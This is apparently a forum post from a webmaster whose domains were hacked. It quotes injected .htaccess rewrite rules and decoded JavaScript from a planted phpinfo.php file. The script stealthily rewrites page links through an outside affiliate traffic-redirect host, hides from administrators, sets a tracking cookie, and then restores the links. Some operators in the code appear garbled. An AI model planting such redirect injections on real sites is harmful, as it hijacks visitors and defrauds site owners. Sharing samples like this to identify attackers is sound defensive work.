someone hacked about my 20 domains with agp sql
and changed htaccess and put there something like this:
RewriteRule ^$ index.php^M
RewriteCond %{REQUEST_FILENAME} -f^M
RewriteCond %{REQUEST_FILENAME} !phpinfo.php^M
RewriteCond %{HTTP_REFERER} ^http:// [NC]^M
RewriteCond %{HTTP_REFERER} !^
http://(www\.)?nextpicturez.com [NC]^M
RewriteCond %{REQUEST_METHOD} ^GET$^M
RewriteRule ^(.*)\.(html|htm|shtml|php)$ phpinfo.php?a=$1&b=$2&c=%{QUERY_STRING
RewriteRule ^j$ phpinfo.php?d=j [L]
and phpinfo.php contains that script (encoded):
document.write('');
function remake() {
var s="http://gall-router.com/traff.php?affid=frog33&u=";
if(document.cookie.indexOf("zq=1")hahahaha-1&&document.cookie.indexOf("adm")hahahaha-1&&document.cookie.indexOf("login")hahahaha-1&&document.referrer.indexOf("admin")hahahaha-1)
{
for(var i=0;i<document.links.length;++i) {
if(document.links[i].href)document.links[i].href=s+document.links[i].href
}
var today=new Date();
var expires=new Date();
expires.setTime(today.getTime()+86400000);
document.cookie="zq=1; expires="+expires.toGMTString();
function normal() {
for(var i=0;i<document.links.length;++i) {
if(document.links[i].href)document.links[i].href=document.links[i].href.substring(s.length)
}
}
setTimeout(normal,300)
}
}
i see code:
http://gall-router.com/traff.php?affid=frog33
but i did not find any information about this company gall-router.com, domain is very new, their dns is very new too...
anybody know gall-router.com ? who the hell are they?